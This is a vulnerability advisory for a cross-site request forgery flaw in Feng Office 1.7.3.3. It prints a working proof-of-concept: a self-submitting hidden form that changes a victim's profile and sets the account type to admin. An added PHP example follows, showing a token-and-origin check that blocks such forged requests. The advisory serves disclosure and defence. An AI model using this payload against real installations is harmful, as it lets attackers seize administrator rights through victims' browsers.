Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_feng_office.html
Product: Feng Office
Vendor: Secure Data SRL (http://www.fengoffice.com/)
Vulnerable Version: 1.7.3.3 and probably prior versions
Vendor Notification: 17 March 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists because the user editing script fails to properly verify the source of the HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/index.php?active_project=0&ajax=true&c=account&a=edit_profile&id=USERID&current=administration" method="post" name="main">
<input type="hidden" name="user[display_name]" value="test">
<input type="hidden" name="user[username]" value="test">
<input type="hidden" name="user[company_id]" value="1">
<input type="hidden" name="user[personal_project_id]" value="2">
<input type="hidden" name="user[type]" value="admin">
<input type="hidden" name="user[auto_assign]" value="0">
<input type="hidden" name="user[autodetect_time_zone]" value="1">
<input type="hidden" name="user[timezone]" value="0">
<input type="hidden" name="user[email]" value="email@example.com">
<input type="hidden" name="user[title]" value="">
</form>
<script>
document.main.submit();
</script>
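The check the user editing script lacks, shown as an added example in PHP (the product's language); this is not code from the advisory or from Feng Office. The function names, the `csrf_token` field name and the `https://office.example` origin are assumptions made for illustration, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not Feng Office code: synchronizer-token check for a
// state-changing action such as the profile edit request in the PoC.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/** True only for a POST whose token matches the session and whose Origin, if sent, is ours. */
function csrf_request_is_valid(array $server, array $post, array $session, string $ownOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false; // browser reports the form was submitted from another site
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() guards against csrf_token[]=... arriving as an array.
    return is_string($expected) && is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed sample requests (not captured traffic).
$session   = ['csrf_token' => bin2hex(random_bytes(32))];
$own       = 'https://office.example';
$forged    = ['user' => ['type' => 'admin']];               // PoC-style body, no token
$genuine   = $forged + ['csrf_token' => $session['csrf_token']];
$crossSite = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'];
$sameSite  = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $own];

var_dump(csrf_request_is_valid($crossSite, $forged, $session, $own)); // cross-site, no token
var_dump(csrf_request_is_valid($sameSite, $forged, $session, $own));  // same origin, no token
var_dump(csrf_request_is_valid($sameSite, $genuine, $session, $own)); // token matches session
```

A handler would call `csrf_request_is_valid($_SERVER, $_POST, $_SESSION, $ownOrigin)` before applying any profile change and reject the request when it returns false.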